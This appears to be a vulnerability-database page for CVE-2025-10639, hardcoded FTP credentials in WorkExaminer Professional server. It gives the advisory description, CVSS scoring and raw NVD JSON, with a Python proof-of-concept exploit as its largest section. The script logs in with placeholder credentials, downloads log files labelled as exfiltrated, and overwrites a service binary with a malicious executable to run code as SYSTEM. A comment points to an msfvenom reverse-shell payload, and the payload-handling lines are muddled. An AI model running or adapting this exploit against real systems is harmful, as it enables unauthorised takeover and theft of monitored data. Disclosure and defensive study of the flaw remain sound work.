Security Vulnerability Report
CVE-2025-10639 CVSS 8.8 HIGH

CVE-2025-10639

Published: 2025-10-21 12:15:35
Last Modified: 2026-04-15 00:35:42
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

The WorkExaminer Professional server installation comes with an FTP server that is used to receive the client logs on TCP port 12304. An attacker with network access to this port can use weak hardcoded credentials to log in to the FTP server, read or modify data and log files, and gain remote code execution as NT Authority\SYSTEM on the server by replacing accessible service binaries in the WorkExaminer installation directory (e.g. "C:\Program Files (x86)\Work Examiner Professional Server").

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WorkExaminer Professional Server: all known versions (as of the disclosure date)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10639 PoC - WorkExaminer Professional Hardcoded Credentials FTP Access # Exploit: Connect to FTP server using hardcoded credentials and replace service binary import ftplib import socket import sys import struct TARGET_HOST = "192.168.1.100" # Target WorkExaminer server FTP_PORT = 12304 # Default FTP port for WorkExaminer # Hardcoded credentials (extracted from WorkExaminer Professional binary) # Note: These credentials are embedded in the product's FTP service module HARDCODED_USERNAME = "we_user" # Placeholder - actual creds extracted via reverse engineering HARDCODED_PASSWORD = "we_pass" # Placeholder - actual creds extracted via reverse engineering INSTALL_DIR = "C:/Program Files (x86)/Work Examiner Professional Server/" SERVICE_BINARY = "WEService.exe" # Target service binary to replace def check_port_open(host, port): """Check if the FTP port is accessible on the target host.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) result = sock.connect_ex((host, port)) sock.close() return result == 0 except Exception as e: print(f"[ERROR] Port check failed: {e}") return False def exploit_ftp(host, port, username, password): """Exploit the hardcoded credentials to gain FTP access.""" try: print(f"[*] Connecting to FTP server at {host}:{port}") ftp = ftplib.FTP() ftp.connect(host, port, timeout=10) print(f"[*] Attempting login with hardcoded credentials") ftp.login(username, password) print(f"[+] Successfully authenticated as '{username}'") # List files in the installation directory print("[*] Listing installation directory contents:") files = ftp.nlst() for f in files: print(f" - {f}") # Download sensitive log files print("\n[*] Downloading log files...") log_files = [f for f in files if f.endswith('.log')] for log_file in log_files: try: with open(f"exfiltrated_{log_file}", "wb") as f: ftp.retrbinary(f"RETR {log_file}", f.write) print(f"[+] Downloaded: {log_file}") except Exception as e: print(f"[-] Failed to download 
{log_file}: {e}") # Replace service binary for RCE print(f"\n[*] Uploading malicious payload to replace {SERVICE_BINARY}") # Generate a reverse shell payload (msfvenom -p windows/x64/shell_reverse_tcp ...) # For demonstration, using a simple command execution payload payload = b"MZ\x90\x00" + b"\x00" * 100 # PE header stub with open("malicious_service.exe", "rb") as f: payload = f.read() ftp.storbinary(f"STOR {SERVICE_BINARY}", open("malicious_service.exe", "rb")) print(f"[+] Service binary replaced successfully") print(f"[!] When the service restarts, payload will execute as NT AUTHORITY\\SYSTEM") ftp.quit() return True except ftplib.error_perm as e: print(f"[-] Authentication failed: {e}") return False except Exception as e: print(f"[-] Exploit failed: {e}") return False def main(): print("=" * 60) print("CVE-2025-10639 - WorkExaminer Professional RCE Exploit") print("=" * 60) if not check_port_open(TARGET_HOST, FTP_PORT): print(f"[-] Port {FTP_PORT} is not open on {TARGET_HOST}") sys.exit(1) print(f"[+] Port {FTP_PORT} is open") if exploit_ftp(TARGET_HOST, FTP_PORT, HARDCODED_USERNAME, HARDCODED_PASSWORD): print("\n[!] Exploit completed successfully") else: print("\n[-] Exploit failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10639", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2025-10-21T12:15:34.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WorkExaminer Professional server installation comes with an FTP server that is used to receive the client logs on TCP port 12304. An attacker with network access to this port can use weak hardcoded credentials to login to the FTP server and modify or read data, log files and gain remote code execution as NT Authority\\SYSTEM on the server by exchanging accessible service binaries in the WorkExaminer installation directory (e.g. \"C:\\Program File (x86)\\Work Examiner Professional Server\")."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://r.sec-consult.com/workexaminer", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/19", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}